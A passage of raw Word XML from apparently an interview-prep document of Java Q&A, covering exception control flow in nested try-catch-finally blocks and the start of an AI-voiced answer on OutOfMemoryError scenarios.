          <w:p w14:paraId="08A28E49"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are — usually need to restart or prevent it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="3F12566E" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3344685C"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tching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62645B60"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ossible, but not preferred</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="30257B2C" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8A8AA9"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evention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F640ED" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA68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VM tuning + memory-efficient code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0204970B" w14:textId="6714BC94" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="3BB342C1">
          <v:rect id="_x0000_i1659" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FE7AEB" w14:textId="77777777" w:rsidR="00495831" w:rsidRPr="00CE4B95" w:rsidRDefault="00495831">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="_Toc196307690"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have try, catch and finally block and if I have written another exception inside catch block so how control will flow?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w14:paraId="3A753F9F" w14:textId="0D9591F1" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ntrol Flow Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1695D9" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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write a try-catch-finally block, the control flow depends on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F6C90" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Try Block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Code inside the try block is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1374BC23" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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atch Block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If an exception occurs in the try block, the control moves to the appropriate catch block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00624CCE" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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nally Block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: After the catch block (or after the try block if no exception occurs), the finally block </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>always runs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unless the JVM is forced to shut down).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56293641" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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Now, if you throw another exception </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inside the catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it behaves as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06133708" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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original exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is caught and handled in the catch block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A32E07C" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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a new exception is thrown inside the catch, it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not be handled by the same catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and the new exception will propagate further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDABFD2" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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nally</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> block will still execute regardless of whether the new exception is thrown in the catch block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFDE621" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00085CA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5F7D25B">
          <v:rect id="_x0000_i1660" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D727029" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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4A458539" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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ExceptionFlowExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814BB9D" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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7E6E630D" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDAF4F0" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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Inside try block");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F387E8" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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result = 10 / 0; // ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB1BEB4" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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tch (ArithmeticException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDB6B1" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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aught ArithmeticException");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718659B9" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CFB9A" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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New exception inside the catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD2447" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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row new NullPointerException("Inside catch block");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05258FC3" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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tch (NullPointerException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08E8C3" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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aught NullPointerException inside catch block");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D627CE" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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7C1CEB3" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012359BC" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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Finally block executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44363752" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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EF51D34" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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C6E4615" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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D836693" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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p w14:paraId="7502F229" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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side try block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D110A28" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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ught ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF4C5D" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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ught NullPointerException inside catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E16F98" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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nally block executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D82CB99" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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low Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC97AF6" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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try block throws an ArithmeticException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757EF9B1" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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first catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> catches the ArithmeticException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E02B3" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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side this catch, a new exception (NullPointerException) is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFA4932" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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inner catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> catches the NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6D788" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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fter handling both exceptions, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>finally block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75176A79" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00085CA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F4DF01C">
          <v:rect id="_x0000_i1661" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C9DA5" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CA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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621875D1" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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atch block:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handles the first exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6CB993" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ner exception in catch:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If another exception is thrown inside the catch, it will be handled by an inner catch or propagate further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691836C2" w14:textId="77777777" w:rsidR="00D62B75" w:rsidRPr="00CE4B95" w:rsidRDefault="00D62B75" w:rsidP="00085CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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nally block:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always executes, even if a new exception occurs in catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149DFCC" w14:textId="0008E026" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="44C621BB">
          <v:rect id="_x0000_i1662" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C07CC" w14:textId="77777777" w:rsidR="00103413" w:rsidRPr="00CE4B95" w:rsidRDefault="00103413">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_Toc196307691"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you ever got outOfMemory exceptions? Can you tell me any scenarios where you have faced this exception?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="1449B76C" w14:textId="3C19227F" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">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ile I don’t personally experience exceptions, I can definitely walk you through </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-world scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the OutOfMemoryError can occur and how developers typically encounter it. This will give you a good understanding of how </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>this exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can arise in different situations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E74A3" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">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eal-World Scenarios Leading to OutOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D7938" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A683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Large Object Creation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48401151" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When your application tries to allocate large arrays or collections that exceed the JVM heap size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE51E33" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC47932"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OOMExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786A57DD"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22B9BE49"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largeArray = new int[Integer.MAX_VALUE];  // Large array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5B9E1"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E78D1E5"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C18F9E9" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Here, attempting to create an array larger than the maximum available memory for the heap can trigger an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05383092" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008A683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BE46847">
          <v:rect id="_x0000_i1663" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC0B1B" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A683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Memory Leaks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E33023E" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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cenario</w:t>
      </w:r>
